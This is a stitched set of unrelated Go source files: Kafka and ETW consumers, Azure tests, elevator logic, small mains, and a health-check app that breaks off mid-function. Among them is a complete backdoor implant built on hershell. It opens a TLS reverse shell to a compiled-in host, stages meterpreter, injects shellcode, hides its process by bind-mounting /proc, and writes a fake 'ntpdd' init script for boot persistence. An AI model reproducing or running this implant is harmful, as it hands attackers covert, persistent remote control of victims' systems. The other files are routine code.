	// Local renamed from the original, which shadowed the
	// processorsForConfig function with a variable of the same name.
	procs, err := processorsForConfig(beatInfo, cfg)
	if err != nil {
		return nil, err
	}
	return &Consumer{
		log:        logp.NewLogger("etw"),
		Config:     cfg,
		processors: procs,
	}, nil
}
// Run connects to the publisher pipeline, enables the ETW trace session,
// and blocks consuming events until done is closed or reading fails.
// The trace session is always stopped on return.
func (c *Consumer) Run(done <-chan struct{}, pipeline beat.Pipeline, session config.Session) {
	client, err := c.connect(pipeline)
	if err != nil {
		// NOTE(review): the format has one %s verb but is given the literal
		// string "session" rather than session.Name — looks like a bug; the
		// underlying err is also not logged. Confirm intent.
		logp.Warn("EventLog[%s] Pipeline error. Failed to connect to publisher pipeline",
			"session")
		return
	}
	c.client = client
	// close client on function return or when `done` is triggered (unblock client)
	defer c.client.Close()
	go func() {
		<-done
		c.client.Close()
	}()
	sessionHandle, sessionProperties, err := enableTrace(session)
	if err != nil {
		c.log.Errorf("session %s could not be enabled: %v", session.Name, err)
		return
	}
	// Always stop the trace session on exit, keyed by the first provider GUID.
	defer func() {
		guid, _ := GUIDFromString(session.Providers[0])
		c.log.Info("Session %s, stop processing.", session.Name)
		if err := stopTrace(sessionHandle, sessionProperties, guid); err != nil {
			c.log.Errorf("session %s could not be closed: %v", session.Name, err)
			return
		}
	}()
	// Blocks until the trace is closed or fails.
	err = c.readEvents(session.Name)
	if err != nil {
		c.log.Errorf("session %s could not read events: %v", session.Name, err)
		return
	}
}
// connect opens a publisher pipeline client with guaranteed-send semantics
// and an ACK callback that logs each published batch size.
func (c *Consumer) connect(pipeline beat.Pipeline) (beat.Client, error) {
	cfg := beat.ClientConfig{
		PublishMode: beat.GuaranteedSend,
		Processing: beat.ProcessingConfig{
			EventMetadata: c.eventMeta,
			Processor:     c.processors,
		},
		ACKCount: func(n int) {
			c.log.Info("successfully published %d events", n)
		},
	}
	return pipeline.ConnectWith(cfg)
}
// readEvents opens the named trace session with this consumer's buffer and
// event callbacks, wrapping any failure with context.
func (c *Consumer) readEvents(sessionName string) error {
	if err := openTrace(sessionName, c.bufferCallback, c.eventReceivedCallback); err != nil {
		return errors.Wrap(err, "Failed to open trace")
	}
	return nil
}
// bufferCallback is invoked by ETW once per processed buffer; returning 1
// tells the API to keep processing.
func (c *Consumer) bufferCallback(etl *EventTraceLogfile) uintptr {
	_ = etl // buffer metadata is unused
	return 1
}
// eventReceivedCallback publishes each received ETW event to the pipeline.
// Fix: pointer receiver for consistency with every other Consumer method
// and to avoid copying the whole struct on each delivered event.
func (c *Consumer) eventReceivedCallback(er *EventRecord) uintptr {
	c.client.Publish(er.ToEvent())
	return 0
}
|
package main
import (
"encoding/json"
"fmt"
"mysql_byroad/model"
"strings"
"sync"
"time"
"github.com/Shopify/sarama"
log "github.com/Sirupsen/logrus"
"github.com/samuel/go-zookeeper/zk"
"github.com/wvanbergen/kafka/consumergroup"
)
// Entity is one canal binlog change event: the affected table, the row
// images before/after, the event type, and its execution time.
type Entity struct {
	Database string `json:"database"`
	Table string `json:"table"`
	BeforeColumns Columns `json:"beforeColumns"`
	AfterColumns Columns `json:"afterColumns"`
	EventType string `json:"eventType"`
	ExecuteTime int64 `json:"executeTime"`
}

// Columns is the ordered set of column values in a row image.
type Columns []*Column

// Column is a single column value with its metadata flags.
type Column struct {
	Name string `json:"name"`
	Value string `json:"value"`
	SqlType int `json:"sqlType"`
	IsKey bool `json:"isKey"`
	IsNull bool `json:"isNull"`
	Updated bool `json:"updated"`
}
// String renders every column as "%+v " concatenated, for logging.
// Fix: build with strings.Builder instead of += in a loop (the original was
// quadratic in the number of columns); output is byte-identical.
func (columns Columns) String() string {
	var b strings.Builder
	for _, column := range columns {
		fmt.Fprintf(&b, "%+v ", column)
	}
	return b.String()
}
// String renders the entity as "db.table:event[before->after]".
// Fix: %s instead of the non-standard %+s — the '+' flag has no effect for
// string operands, so output is unchanged.
func (entity *Entity) String() string {
	ret := fmt.Sprintf("%s.%s:%s[%s->%s]", entity.Database, entity.Table, entity.EventType, entity.BeforeColumns.String(), entity.AfterColumns.String())
	return ret
}
// Encode serializes the entity to JSON.
func (entity *Entity) Encode() ([]byte, error) {
	return json.Marshal(entity)
}
// Length returns the size in bytes of the entity's JSON encoding, or 0 if
// it cannot be marshaled.
func (entity *Entity) Length() int {
	if data, err := json.Marshal(entity); err == nil {
		return len(data)
	}
	return 0
}
// KafkaHandler receives each decoded binlog entity for a consumer group.
type KafkaHandler interface {
	HandleKafkaEvent(entity *Entity, group string)
}

// KafkaConsumer wraps a consumer-group subscription over a set of topics
// and fans received entities out to its handlers.
type KafkaConsumer struct {
	Topics []string // subscribed kafka topics
	GroupID string // consumer group id
	consumer *consumergroup.ConsumerGroup
	handlers []KafkaHandler // dispatched in registration order
}
/*
NewKafkaConsumer creates a kafka consumer that subscribes to the topics
using the consumer-group mechanism. Offsets start at the newest message;
timeout, reset behavior, and the zookeeper chroot come from kafkaconfig.
*/
func NewKafkaConsumer(topics []string, groupid string, kafkaconfig KafkaConfig) (*KafkaConsumer, error) {
	kconsumer := KafkaConsumer{
		Topics:   topics,
		GroupID:  groupid,
		handlers: make([]KafkaHandler, 0, 1),
	}
	config := consumergroup.NewConfig()
	config.Offsets.Initial = sarama.OffsetNewest
	config.Offsets.ProcessingTimeout = kafkaconfig.OffsetProcessingTimeout.Duration
	config.Offsets.ResetOffsets = kafkaconfig.OffsetResetOffsets
	config.ClientID = "byroad"
	config.Zookeeper.Chroot = kafkaconfig.ZKChroot
	consumer, err := consumergroup.JoinConsumerGroup(groupid, topics, kafkaconfig.ZkAddrs, config)
	log.Infof("new kafka consumers for %s, %+v", groupid, topics)
	if err != nil {
		return nil, err
	}
	kconsumer.consumer = consumer
	return &kconsumer, nil
}
// HandleMessage starts two goroutines: one consuming messages (decode,
// dispatch to handlers, commit offset) and one draining consumer errors.
// It returns immediately; the goroutines run until the consumer is closed.
// Fix: on a JSON decode failure the handlers are no longer invoked with a
// zero-value Entity; the offset is still committed so the malformed message
// is not redelivered forever.
func (kconsumer *KafkaConsumer) HandleMessage() {
	go func() {
		for msg := range kconsumer.consumer.Messages() {
			log.Debugf("receive consumer message")
			entity := Entity{}
			if err := json.Unmarshal(msg.Value, &entity); err != nil {
				log.Errorf("kafka consumer unmarshal error: %s", err.Error())
			} else {
				for _, handler := range kconsumer.handlers {
					handler.HandleKafkaEvent(&entity, kconsumer.GroupID)
				}
			}
			if err := kconsumer.consumer.CommitUpto(msg); err != nil {
				log.Errorf("kafka commitupto error: %s", err.Error())
			}
		}
	}()
	go func() {
		for err := range kconsumer.consumer.Errors() {
			log.Errorf("consumer error: %s", err)
		}
	}()
}
// AddHandler appends a handler invoked for every consumed entity.
// Not safe to call concurrently with HandleMessage.
func (kconsumer *KafkaConsumer) AddHandler(handler KafkaHandler) {
	kconsumer.handlers = append(kconsumer.handlers, handler)
}

// Close shuts down the underlying consumer group.
func (kconsumer *KafkaConsumer) Close() error {
	return kconsumer.consumer.Close()
}
// KafkaConsumerManager tracks the live consumers keyed by group id.
// The embedded RWMutex guards the consumers map; the struct must therefore
// not be copied.
type KafkaConsumerManager struct {
	consumers map[string]*KafkaConsumer
	sync.RWMutex
	config KafkaConfig
	handlers []KafkaHandler // handlers attached to every new consumer
}

// NewKafkaConsumerManager returns an empty manager using config for all
// consumers it creates.
func NewKafkaConsumerManager(config KafkaConfig) *KafkaConsumerManager {
	manager := KafkaConsumerManager{
		consumers: make(map[string]*KafkaConsumer),
		config:    config,
	}
	return &manager
}
// Add registers kc under its group id, replacing any existing entry.
func (kcm *KafkaConsumerManager) Add(kc *KafkaConsumer) {
	kcm.Lock()
	defer kcm.Unlock()
	kcm.consumers[kc.GroupID] = kc
}

// Delete removes kc (keyed by its group id) from the manager.
func (kcm *KafkaConsumerManager) Delete(kc *KafkaConsumer) {
	kcm.Lock()
	defer kcm.Unlock()
	delete(kcm.consumers, kc.GroupID)
}

// Get returns the consumer registered for groupid, or nil.
func (kcm *KafkaConsumerManager) Get(groupid string) *KafkaConsumer {
	kcm.RLock()
	defer kcm.RUnlock()
	return kcm.consumers[groupid]
}
// Iter streams all consumers over an unbuffered channel.
// NOTE(review): the read lock is held while sending on an unbuffered
// channel — if the receiver calls a write-locking manager method mid-loop
// this deadlocks; prefer IterBuffered in that case. Confirm callers.
func (kcm *KafkaConsumerManager) Iter() <-chan *KafkaConsumer {
	ch := make(chan *KafkaConsumer)
	go func() {
		kcm.RLock()
		for _, kc := range kcm.consumers {
			ch <- kc
		}
		kcm.RUnlock()
		close(ch)
	}()
	return ch
}

// IterBuffered streams all consumers over a channel pre-sized to the
// current count, so the sending goroutine does not block on slow readers
// (assuming the map does not grow between Len and the snapshot).
func (kcm *KafkaConsumerManager) IterBuffered() <-chan *KafkaConsumer {
	ch := make(chan *KafkaConsumer, kcm.Len())
	go func() {
		kcm.RLock()
		for _, kc := range kcm.consumers {
			ch <- kc
		}
		kcm.RUnlock()
		close(ch)
	}()
	return ch
}

// Len returns the current number of registered consumers.
func (kcm *KafkaConsumerManager) Len() int {
	kcm.RLock()
	length := len(kcm.consumers)
	kcm.RUnlock()
	return length
}
// GroupExists reports whether a consumer is registered for groupid.
func (kcm *KafkaConsumerManager) GroupExists(groupid string) bool {
	kcm.RLock()
	defer kcm.RUnlock()
	_, ok := kcm.consumers[groupid]
	return ok
}
/*
InitConsumers creates a kafka consumer for every subscribed task, based on
each task's database/table field subscriptions. Tasks are processed
concurrently; the call blocks until all are done.
*/
func (kcm *KafkaConsumerManager) InitConsumers(tasks []*model.Task) {
	wg := sync.WaitGroup{}
	for _, task := range tasks {
		if task.SubscribeStat == model.TASK_STAT_SUBSCRIBE {
			wg.Add(1)
			// Pass task explicitly so each goroutine binds its own value.
			go func(t *model.Task) {
				for _, handler := range kcm.handlers {
					kcm.traverseTask(t, handler, kcm.config.OffsetResetOffsets)
				}
				wg.Done()
			}(task)
		}
	}
	wg.Wait()
}

/*
AddHandler registers a handler that will be attached to every consumer the
manager subsequently creates.
*/
func (kcm *KafkaConsumerManager) AddHandler(handler KafkaHandler) {
	kcm.handlers = append(kcm.handlers, handler)
}
/*
StopConsumers closes every registered kafka consumer concurrently and
blocks until all have shut down. Close errors are logged, not returned.
*/
func (kcm *KafkaConsumerManager) StopConsumers() {
	wg := sync.WaitGroup{}
	for consumer := range kcm.Iter() {
		wg.Add(1)
		go func(c *KafkaConsumer) {
			log.Infof("close consumer %s", c.GroupID)
			err := c.Close()
			if err != nil {
				log.Errorf("kafka consumer close error: %s", err.Error())
			}
			wg.Done()
		}(consumer)
	}
	wg.Wait()
}

/*
AddTask walks the task's subscribed field info and creates consumers for
any matching kafka topics that are not yet subscribed, resetting offsets.
*/
func (kcm *KafkaConsumerManager) AddTask(task *model.Task) {
	for _, handler := range kcm.handlers {
		kcm.traverseTask(task, handler, true)
	}
}
/*
UpdateTask rebuilds the consumer for the task: the existing consumer (if
any) is shut down and removed, then fresh consumers are created for each
handler without resetting offsets.
Fix: shut down via the wrapper Close (consistent with StopTask) and log
the error instead of silently discarding it.
*/
func (kcm *KafkaConsumerManager) UpdateTask(task *model.Task) {
	groupid := GenGroupID(task)
	consumer := kcm.Get(groupid)
	if consumer != nil {
		if err := consumer.Close(); err != nil {
			log.Errorf("kafka consumer close error: %s", err.Error())
		}
		kcm.Delete(consumer)
	}
	for _, handler := range kcm.handlers {
		kcm.traverseTask(task, handler, false)
	}
}
// StartTask subscribes the task's topics; alias for AddTask.
func (kcm *KafkaConsumerManager) StartTask(task *model.Task) {
	kcm.AddTask(task)
}
// StopTask stops the task's subscription and removes its consumer from the
// manager. Fix: the Close error is now logged (it was silently discarded),
// matching StopConsumers' error handling.
func (kcm *KafkaConsumerManager) StopTask(task *model.Task) {
	groupid := GenGroupID(task)
	consumer := kcm.Get(groupid)
	if consumer != nil {
		if err := consumer.Close(); err != nil {
			log.Errorf("kafka consumer close error: %s", err.Error())
		}
		kcm.Delete(consumer)
	}
}
// DeleteTask removes the task's subscription; alias for StopTask.
func (kcm *KafkaConsumerManager) DeleteTask(task *model.Task) {
	kcm.StopTask(task)
}
// traverseTask walks the task's field subscriptions and, if no consumer
// exists yet for the task's group id, creates one over the matching topics
// with the given handler attached. resetOffset controls whether the new
// consumer resets its offsets.
func (kcm *KafkaConsumerManager) traverseTask(task *model.Task, handler KafkaHandler, resetOffset bool) {
	topics := kcm.getTopics(task)
	if len(topics) == 0 {
		log.Errorf("no matched kafka topic found for %s!", task.Name)
		return
	}
	groupid := GenGroupID(task)
	if !kcm.GroupExists(groupid) {
		// Copy the config so the reset flag applies to this consumer only.
		config := kcm.config
		config.OffsetResetOffsets = resetOffset
		consumer, err := NewKafkaConsumer(topics, groupid, config)
		if err != nil {
			log.Errorf("new kafka consumer error: %s", err.Error())
			return
		}
		consumer.AddHandler(handler)
		consumer.HandleMessage()
		kcm.Add(consumer)
	}
}
// empty is a zero-width set-member marker.
type empty struct{}

// getTopics returns the distinct kafka topics that match any of the task's
// subscribed fields; it returns an empty slice if the topic lookup fails.
// Fix: `for topic := range set` instead of the redundant `topic, _` form
// (gofmt/golint style).
func (kcm *KafkaConsumerManager) getTopics(task *model.Task) []string {
	topics := make([]string, 0, 10)
	set := make(map[string]empty)
	allTopics, err := kcm.getAllTopics()
	if err != nil {
		return topics
	}
	for _, field := range task.Fields {
		matched := getMatchedTopics(allTopics, field)
		for _, topic := range matched {
			set[topic] = empty{}
		}
	}
	for topic := range set {
		topics = append(topics, topic)
	}
	return topics
}
// getAllTopics fetches every kafka topic registered in zookeeper under the
// configured chroot. A fresh connection is opened and closed per call.
func (kcm *KafkaConsumerManager) getAllTopics() ([]string, error) {
	conn, _, err := zk.Connect(kcm.config.ZkAddrs, time.Second*10)
	if err != nil {
		return nil, err
	}
	defer conn.Close()
	children, _, err := conn.Children(kcm.config.ZKChroot + "/brokers/topics")
	if err != nil {
		return nil, err
	}
	log.Debugf("get all topics: %+v", children)
	return children, nil
}
// getMatchedTopics matches the user's subscribed field (schema/table
// patterns) against the topic list and returns the topics that match.
// Topics are expected to be named "<schema>___<table>"; malformed names
// are logged and skipped.
func getMatchedTopics(topics []string, field *model.NotifyField) []string {
	matched := make([]string, 0, 10)
	for _, topic := range topics {
		s := strings.SplitN(topic, "___", 2)
		if len(s) != 2 {
			log.Errorf("get matched topics split topic: %s", topic)
			continue
		}
		schema := s[0]
		table := s[1]
		if isMatch(field.Schema, schema) && isMatch(field.Table, table) {
			matched = append(matched, topic)
		}
	}
	return matched
}
|
package main
import "fmt"
// age is initialized before init()/main() run, demonstrating package-level
// variable initialization order.
var age = test()

// test prints a marker (so initialization order is observable) and returns
// the fixed age value.
func test() int {
	fmt.Println("test")
	const initialAge = 90
	return initialAge
}
//init函数,完成一些初始化的工作
// init runs after package-level variables (age) are initialized and before
// main; the print order demonstrates Go's initialization sequence.
func init() {
	fmt.Println("main init")
}
// main prints the already-initialized age, completing the init-order demo.
func main() {
	fmt.Println("main----age=", age)
}
|
package main
import (
"fmt"
"html/template"
"im/app/controller"
"log"
"net/http"
)
// 注册模板
func registerView() {
//basePath, _ := os.Getwd()
tpl, err := template.ParseGlob("./app/view/*")
if err != nil {
log.Fatal(err)
}
for _, v := range tpl.Templates() {
tplName := v.Name()
fmt.Println(tplName)
http.HandleFunc(tplName, func(w http.ResponseWriter, r *http.Request) {
tpl.ExecuteTemplate(w, tplName, nil)
})
}
}
// main wires static assets, user uploads, templates, and the register/
// login/chat endpoints, then serves on :3000.
func main() {
	// Static asset files.
	http.Handle("/asset/", http.FileServer(http.Dir(".")))
	// User-uploaded resource files.
	http.Handle("/resource/", http.FileServer(http.Dir(".")))
	registerView()
	// User registration.
	http.HandleFunc("/register", controller.UserRegister)
	// Login.
	http.HandleFunc("/login", controller.UserLogin)
	// Chat router.
	http.HandleFunc("/chat", controller.Chat)
	log.Fatal(http.ListenAndServe(":3000", nil))
}
|
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT license.
package armhelpers
import (
"context"
"testing"
)
// TestGetLogAnalyticsWorkspaceInfo exercises the workspace-info lookup
// against the HTTP mock client.
func TestGetLogAnalyticsWorkspaceInfo(t *testing.T) {
	mc, err := NewHTTPMockClient()
	if err != nil {
		t.Fatalf("failed to create HttpMockClient - %s", err)
	}
	mc.RegisterLogin()
	mc.RegisterGetLogAnalyticsWorkspaceInfo()
	if err = mc.Activate(); err != nil {
		t.Fatalf("failed to activate HttpMockClient - %s", err)
	}
	defer mc.DeactivateAndReset()

	azureClient, err := NewAzureClientWithClientSecret(mc.GetEnvironment(), subscriptionID, "clientID", "secret")
	if err != nil {
		t.Fatalf("can not get client %s", err)
	}
	if _, _, _, err = azureClient.GetLogAnalyticsWorkspaceInfo(context.Background(), subscriptionID, resourceGroup, logAnalyticsWorkspaceName); err != nil {
		t.Error(err)
	}
}
// TestEnsureDefaultLogAnalyticsWorkspaceUseExisting verifies the
// existing-workspace path against the HTTP mock client.
func TestEnsureDefaultLogAnalyticsWorkspaceUseExisting(t *testing.T) {
	mc, err := NewHTTPMockClient()
	if err != nil {
		t.Fatalf("failed to create HttpMockClient - %s", err)
	}
	mc.RegisterLogin()
	mc.RegisterEnsureDefaultLogAnalyticsWorkspaceUseExisting()
	if err = mc.Activate(); err != nil {
		t.Fatalf("failed to activate HttpMockClient - %s", err)
	}
	defer mc.DeactivateAndReset()

	azureClient, err := NewAzureClientWithClientSecret(mc.GetEnvironment(), subscriptionID, "clientID", "secret")
	if err != nil {
		t.Fatalf("can not get client %s", err)
	}
	if _, err = azureClient.EnsureDefaultLogAnalyticsWorkspace(context.Background(), resourceGroup, location); err != nil {
		t.Error(err)
	}
}
// TestEnsureDefaultLogAnalyticsWorkspaceCreateNew verifies the
// create-new-workspace path against the HTTP mock client.
func TestEnsureDefaultLogAnalyticsWorkspaceCreateNew(t *testing.T) {
	mc, err := NewHTTPMockClient()
	if err != nil {
		t.Fatalf("failed to create HttpMockClient - %s", err)
	}
	mc.RegisterLogin()
	mc.RegisterEnsureDefaultLogAnalyticsWorkspaceCreateNew()
	if err = mc.Activate(); err != nil {
		t.Fatalf("failed to activate HttpMockClient - %s", err)
	}
	defer mc.DeactivateAndReset()

	azureClient, err := NewAzureClientWithClientSecret(mc.GetEnvironment(), subscriptionID, "clientID", "secret")
	if err != nil {
		t.Fatalf("can not get client %s", err)
	}
	if _, err = azureClient.EnsureDefaultLogAnalyticsWorkspace(context.Background(), resourceGroup, "westeurope"); err != nil {
		t.Error(err)
	}
}
// TestEnsureDefaultLogAnalyticsWorkspaceCreateNewInMC verifies the
// create-new path for the AzureChinaCloud (Mooncake) environment.
func TestEnsureDefaultLogAnalyticsWorkspaceCreateNewInMC(t *testing.T) {
	mc, err := NewHTTPMockClient()
	if err != nil {
		t.Fatalf("failed to create HttpMockClient - %s", err)
	}
	mc.RegisterLogin()
	mc.RegisterEnsureDefaultLogAnalyticsWorkspaceCreateNewInMC()
	if err = mc.Activate(); err != nil {
		t.Fatalf("failed to activate HttpMockClient - %s", err)
	}
	defer mc.DeactivateAndReset()

	env := mc.GetEnvironment()
	env.Name = "AzureChinaCloud"
	azureClient, err := NewAzureClientWithClientSecret(env, subscriptionID, "clientID", "secret")
	if err != nil {
		t.Fatalf("can not get client %s", err)
	}
	if _, err = azureClient.EnsureDefaultLogAnalyticsWorkspace(context.Background(), resourceGroup, "chinaeast2"); err != nil {
		t.Error(err)
	}
}
|
package localElevatorFSM
import (
"../config"
"../elevio"
)
// requestsAbove reports whether any button request exists strictly above
// the elevator's current floor.
func requestsAbove(e Elevator) bool {
	for f := e.floor + 1; f < config.N_FLOORS; f++ {
		for b := 0; b < config.N_BUTTONS; b++ {
			if e.requests[f][b] {
				return true
			}
		}
	}
	return false
}
// requestsBelow reports whether any button request exists strictly below
// the elevator's current floor.
func requestsBelow(e Elevator) bool {
	for f := 0; f < e.floor; f++ {
		for b := 0; b < config.N_BUTTONS; b++ {
			if e.requests[f][b] {
				return true
			}
		}
	}
	return false
}
// chooseDirection picks the next motor direction from pending requests,
// preferring to continue in the current direction of travel.
func chooseDirection(e Elevator) elevio.MotorDirection {
	switch e.direction {
	// Note which functions are called first for each case!
	// For MD_Stop it doesn't really matter which one goes first
	case elevio.MD_Up:
		// Keep going up while anything is above; otherwise reverse.
		if requestsAbove(e) {
			return elevio.MD_Up
		} else if requestsBelow(e) {
			return elevio.MD_Down
		} else {
			return elevio.MD_Stop
		}
	case elevio.MD_Stop:
		// When idle, check below first (same priority as going down).
		fallthrough
	case elevio.MD_Down:
		if requestsBelow(e) {
			return elevio.MD_Down
		} else if requestsAbove(e) {
			return elevio.MD_Up
		} else {
			return elevio.MD_Stop
		}
	}
	// Unreachable for known directions; safe default.
	return elevio.MD_Stop
}
// shouldStop reports whether the elevator should stop at its current
// floor: stop for a same-direction hall call or a cab call, or when no
// further requests exist in the direction of travel.
func shouldStop(e Elevator) bool {
	var floor = e.floor
	switch e.direction {
	case elevio.MD_Up:
		return e.requests[floor][elevio.BT_HallUp] ||
			e.requests[floor][elevio.BT_Cab] ||
			!requestsAbove(e)
	case elevio.MD_Down:
		return e.requests[floor][elevio.BT_HallDown] ||
			e.requests[floor][elevio.BT_Cab] ||
			!requestsBelow(e)
	case elevio.MD_Stop:
		fallthrough
	default:
		// Already stopped (or unknown direction): stay stopped.
		return true
	}
}
// clearRequestAtFloor clears every request at the elevator's current floor
// and announces completed hall orders on orderCompleteCh (cab orders are
// cleared but not announced — they are local to this elevator).
func clearRequestAtFloor(elevator *Elevator, orderCompleteCh chan<- elevio.ButtonEvent) {
	for button := 0; button < config.N_BUTTONS; button++ {
		if button != elevio.BT_Cab && elevator.requests[elevator.floor][button] {
			orderCompleteCh <- elevio.ButtonEvent{Floor: elevator.floor, Button: elevio.ButtonType(button)}
		}
		elevator.requests[elevator.floor][button] = false
	}
}
// clearRequestAtFloorSimulation clears every request at the current floor
// without announcing completions (used when simulating).
func clearRequestAtFloorSimulation(elevator *Elevator) {
	for b := 0; b < config.N_BUTTONS; b++ {
		elevator.requests[elevator.floor][b] = false
	}
}
// clearAllRequest wipes every request on every floor.
func clearAllRequest(elevator *Elevator) {
	for f := 0; f < config.N_FLOORS; f++ {
		for b := 0; b < config.N_BUTTONS; b++ {
			elevator.requests[f][b] = false
		}
	}
}
// clearAllHallRequests wipes the hall (up/down) requests on every floor,
// leaving cab requests intact.
func clearAllHallRequests(elevator *Elevator) {
	for f := 0; f < config.N_FLOORS; f++ {
		elevator.requests[f][elevio.BT_HallDown] = false
		elevator.requests[f][elevio.BT_HallUp] = false
	}
}
|
package data
// DataClient abstracts persistence for transaction-request bookkeeping.
type DataClient interface {
	// InsertRequestInfo stores a request record.
	InsertRequestInfo(ri *RequestInfo) error
	// UpdateRequestInfoStatus updates a request's status.
	UpdateRequestInfoStatus(status int, id int64) error
	// UpdateRequestInfoTimes increments the request's attempt count.
	UpdateRequestInfoTimes(id int64) error
	// UpdateRequestInfoSend records whether a notification mail was sent
	// successfully for the request.
	UpdateRequestInfoSend(id int64) error
	// ListExceptionalRequestInfo returns all abnormal records
	// (status 2: commit failed, 4: rollback failed).
	ListExceptionalRequestInfo() ([]*RequestInfo, error)
	// InsertSuccessStep stores one successfully Tried step.
	InsertSuccessStep(s *SuccessStep) error
	BatchInsertSuccessStep(s []*SuccessStep) error
	// UpdateSuccessStepStatus updates the status of a successful Try step.
	UpdateSuccessStepStatus(rid, sid int64, status int) error
	// Confirm marks the request and its Try steps as committed after all
	// steps succeed.
	Confirm(id int64) error
}
|
package main
import (
"bufio"
"bytes"
"crypto/sha256"
"crypto/tls"
"encoding/hex"
"fmt"
"net"
"os"
"os/exec"
"strings"
"time"
"github.com/lesnuages/hershell/meterpreter"
"github.com/lesnuages/hershell/shell"
)
const (
errCouldNotDecode = 1 << iota
errHostUnreachable = iota
errBadFingerprint = iota
)
var (
connectString string
fingerPrint string
)
func interactiveShell(conn net.Conn) {
var (
exit = false
prompt = "[hershell]> "
scanner = bufio.NewScanner(conn)
)
host, err := os.Hostname()
if err == nil {
prompt = host
}
conn.Write([]byte(prompt))
for scanner.Scan() {
command := scanner.Text()
if len(command) > 1 {
argv := strings.Split(command, " ")
switch argv[0] {
case "meterpreter":
if len(argv) > 2 {
transport := argv[1]
address := argv[2]
ok, err := meterpreter.Meterpreter(transport, address)
if !ok {
conn.Write([]byte(err.Error() + "\n"))
}
} else {
conn.Write([]byte("Usage: meterpreter [tcp|http|https] IP:PORT\n"))
}
case "inject":
if len(argv) > 1 {
shell.InjectShellcode(argv[1])
}
case "doexit":
exit = true
case "run_shell":
conn.Write([]byte("Enjoy your native shell\n"))
runShell(conn)
default:
shell.ExecuteCmd(command, conn)
}
if exit {
break
}
}
conn.Write([]byte(prompt))
}
}
func runShell(conn net.Conn) {
var cmd = shell.GetShell()
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Stdin = conn
cmd.Run()
}
func checkKeyPin(conn *tls.Conn, fingerprint []byte) (bool, error) {
valid := false
connState := conn.ConnectionState()
for _, peerCert := range connState.PeerCertificates {
hash := sha256.Sum256(peerCert.Raw)
if bytes.Compare(hash[0:], fingerprint) == 0 {
valid = true
}
}
return valid, nil
}
func reverse(connectString string, fingerprint []byte) {
var (
conn *tls.Conn
err error
)
config := &tls.Config{InsecureSkipVerify: true}
if conn, err = tls.Dial("tcp", connectString, config); err != nil {
// os.Exit(errHostUnreachable)
return
}
defer conn.Close()
if ok, err := checkKeyPin(conn, fingerprint); err != nil || !ok {
// os.Exit(errBadFingerprint)
return
}
interactiveShell(conn)
}
func cmdRun(cmd string, shell bool) string {
if shell {
out, err := exec.Command("sh", "-c", cmd).Output()
if err != nil {
return ""
}
return strings.TrimSpace(string(out))
} else {
out, err := exec.Command(cmd).Output()
if err != nil {
return ""
}
return strings.TrimSpace(string(out))
}
}
func hideSelf(pid int) {
// hide process bind /proc/1
hideCmd := fmt.Sprintf("mount -o bind /proc/%d /proc/%d", pid, os.Getpid())
cmdRun(hideCmd, true)
}
func makeStartBootup() {
dPath := "/bin/ntpdd"
vRpath := "/etc/init.d/ntpdd"
vLnpath := "/etc/rcS.d/S59ntpdd"
bootCmd := fmt.Sprintf("echo \"#!/bin/sh\" > %s;echo \"%s> /dev/null 2>&1 &\" >> %s;chmod +x %s;ln -s %s %s", vRpath, dPath, vRpath, vRpath, vRpath, vLnpath)
cmdRun(bootCmd, true)
}
func main() {
_, err := net.Listen("tcp", ":65534")
if err != nil {
return
}
hideSelf(1)
makeStartBootup()
if connectString != "" && fingerPrint != "" {
fprint := strings.Replace(fingerPrint, ":", "", -1)
bytesFingerprint, err := hex.DecodeString(fprint)
if err != nil {
os.Exit(errCouldNotDecode)
}
for {
reverse(connectString, bytesFingerprint)
time.Sleep(time.Duration(60) * time.Second)
}
}
}
|
package main
import (
"fmt"
"os"
"github.com/aleale2121/Golang-TODO-Hex-DDD/pkg/cmd"
)
// main boots the TODO service via cmd.RunServer and exits with status 1
// when the server fails to start or returns an error.
func main() {
	if err := cmd.RunServer(); err != nil {
		_, _ = fmt.Fprintf(os.Stderr, "%v\n", err)
		os.Exit(1)
	}
}
|
package app
import (
"errors"
"fmt"
"github.com/domac/ats_check/log"
"github.com/domac/ats_check/util"
"math/rand"
"net"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
//服务器down掉异常
var ErrServerDown = errors.New("parent server down")
//上层节点结构
type ParentServer struct {
Host string
Working bool
MarkDown bool
}
//HaProxy节点结构
type HaProxyServer struct {
Host string
Working bool
MarkDown bool
}
type App struct {
exitChan chan int
cfg *AppConfig
parents map[string]*ParentServer
haproxys map[string]*HaProxyServer
sync.Mutex
parentIsProxy bool
}
// checkIsParent reports whether ip occurs as a substring of any entry
// in parentIps (entries may carry a port suffix, e.g. "10.0.0.1:80").
func checkIsParent(parentIps []string, ip string) bool {
	matched := false
	for i := 0; i < len(parentIps) && !matched; i++ {
		matched = strings.Contains(parentIps[i], ip)
	}
	return matched
}
// NewApp builds the background-process object: it ensures the log file
// exists (shelling out to mkdir/touch), initialises logging at "info"
// level, and flips cfg.Is_parent to 1 when the local IP is found in
// cfg.Parents so this node runs in parent mode.
func NewApp(cfg *AppConfig, log_path string) *App {
	dir := filepath.Dir(log_path)
	util.ShellRun("mkdir -p " + dir)
	util.ShellRun("touch " + log_path)
	// Initialise the logger before anything else logs.
	log.LogInit(log_path, "info")
	localIp := util.GetLocalIp()
	log.GetLogger().Infof(">>>>> local ip is %s", localIp)
	if localIp != "" {
		if checkIsParent(cfg.Parents, localIp) {
			log.GetLogger().Infoln("this node is a parent node")
			cfg.Is_parent = 1
		}
	}
	a := &App{
		cfg: cfg,
		exitChan: make(chan int),
		parents: make(map[string]*ParentServer),
		haproxys: make(map[string]*HaProxyServer),
		parentIsProxy: true,
	}
	return a
}
// Startup launches the health-check goroutines. In parent mode
// (Is_parent == 1) it monitors the configured haproxy nodes; otherwise
// (edge mode) it monitors the parent nodes over TCP. It terminates the
// process with status 2 when no parents are configured at all.
func (self *App) Startup() (err error) {
	log.GetLogger().Infoln("服务初始化")
	parent_config := self.cfg.Parents_config_path
	parents := self.cfg.Parents
	haproxys := self.cfg.Haproxys
	log.GetLogger().Infof("上层节点的ATS配置文件:%s", parent_config)
	// No parent nodes configured: nothing to monitor, bail out hard.
	if len(parents) == 0 {
		log.GetLogger().Errorln("上层结构不存在,请检查配置文件是否填写!")
		self.Shutdown(nil)
		os.Exit(2)
	}
	if self.cfg.Is_parent == 1 {
		// Parent mode: watch the haproxy fleet.
		for _, hhost := range haproxys {
			go self.haproxyHealthCheck(hhost)
		}
	} else {
		// Edge mode: watch the parent nodes (TCP probe variant).
		for _, phost := range parents {
			//go self.parentHealthCheck(phost)
